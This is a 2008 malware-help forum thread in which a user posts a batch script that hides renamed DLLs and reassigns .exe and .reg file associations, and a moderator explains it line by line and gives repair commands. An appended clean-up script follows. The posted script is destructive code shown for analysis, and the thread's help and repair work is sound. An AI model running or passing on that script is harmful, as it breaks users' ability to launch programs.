Annoying special little virus.

Discussion in 'Malware Help (A Specialist Will Reply)' started by DaxterFM, Sep 11, 2008.

  1. DaxterFM

    DaxterFM Private E-2

So this virus is really interesting. It's caused all my exe files to become .dll files, and all my .reg files to become .sys
    Thus, I cannot go into SAFE mode, I cannot run System Restore, and applications do not work (exe being dll files now).

    I no longer know what to do. And here I am.
    I need your help guys. :(

By the way, in case you wanted to know what the virus looked like, seeing as that may help:

    (DO NOT SAVE AS BAT FILE UNLESS YOU WANT IT AS WELL)

    "@echo off
    for %%f in (*.dll) do set virus=%%f
    ren %virus% virus%virus%
    attrib +r +h virus%virus%
    assoc .reg=sysfile
    assoc .exe=dllfile
    copy virus%virus% virus%virus%
    :virus
    taskkill /f /t /im virus%virus%
    tskill /f /t /im virus%virus%
    goto virus"

    Thank you in advance.
     
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!
    • Where did you get this file from?
    • What was it named?
    • Where was it run from? Why did you run this batch file?
    • Are you really sure what you posted is correct? Some of it does not make sense and does not do anything.
    • It does not rename your EXE files. It only renames DLL files and only in the folder where the batch file was run.
    Below is a line by line interpretation of the batch file
• The 1st line just disables echoing of the commands being run.
    • The 2nd & 3rd lines will rename all dll files to have the word virus in front of it. Thus test.dll would become virustest.dll. This would only affect files in the folder where the batch file is run since it does not contain full path information to any particular folders.
    • The 4th line sets the renamed file to be READONLY and HIDDEN
    • The 5th line changes .reg files to be associated as .sys files
    • The 6th line changes .exe files to be associated as .dll files
• The 7th line does nothing because it is trying to copy the renamed file to the same filename, which serves no purpose; it cannot find the file because it was already hidden, and it could not overwrite the same file name anyway since the file is set to READONLY.
    • The 8th line is a label for the goto
    • The 9th line attempts to terminate the process and child processes of the renamed dll file which also serves no purpose since in most cases the DLL itself is not running.
    • The 10th line will do nothing because the options used for tskill are not even valid.
• The 11th line causes the batch file to keep running, looping on lines 8 thru 10.
    You can change your file associations back by running the below commands from either the Start > Run box, Task Manager, or a command prompt. There is a space after assoc.

    assoc .dll=dllfile
    assoc .exe=exefile
assoc .reg=regfile
    assoc .sys=sysfile

    The renaming of DLL files to remove the prepended virus text will have to be performed in the folders where the batch file was run. You will have to use attrib -r -h *.* to unhide the files and to remove the READONLY attribute before you can rename them.
     
    Last edited: Sep 12, 2008
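The clean-up chaslang describes (put the associations back, clear the READONLY/HIDDEN attributes, strip the "virus" prefix from the renamed DLLs) collected into one batch file, as an added example that is not part of the thread and not chaslang's own script. It assumes it is run from a command prompt opened in the folder where the malicious batch file was executed, and that the only damage is the one this thread's batch file can do (associations plus a "virus" prefix on DLLs in that folder).

```batch
@echo off
REM Added example (not from the thread): undo the damage done by the batch
REM file posted above. Run this from a command prompt in the affected folder.

REM 1. Restore the standard associations (the values chaslang lists).
assoc .dll=dllfile
assoc .exe=exefile
assoc .reg=regfile
assoc .sys=sysfile

REM 2. Clear READONLY and HIDDEN so the renamed DLLs can be renamed back.
attrib -r -h virus*.dll

REM 3. Strip the leading "virus" from each renamed DLL. The list is taken
REM    from dir first so renaming files does not disturb the enumeration;
REM    delayed expansion is needed for the !name:~5! substring (skip the
REM    first five characters, i.e. the word "virus").
setlocal enabledelayedexpansion
for /f "delims=" %%f in ('dir /b /a-d virus*.dll 2^>nul') do (
    set "name=%%f"
    echo renaming "%%f" to "!name:~5!"
    ren "%%f" "!name:~5!"
)
endlocal

REM 4. Print the associations so the repair can be checked by eye;
REM    .exe should report exefile and .reg should report regfile.
assoc .exe
assoc .reg
assoc .dll
assoc .sys
```

Because the original script only ever touches the folder it was started in and prepends the prefix once per run, this script only looks in the current folder; if it was run more than once on the same file, run this clean-up again until dir /b virus*.dll lists nothing.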
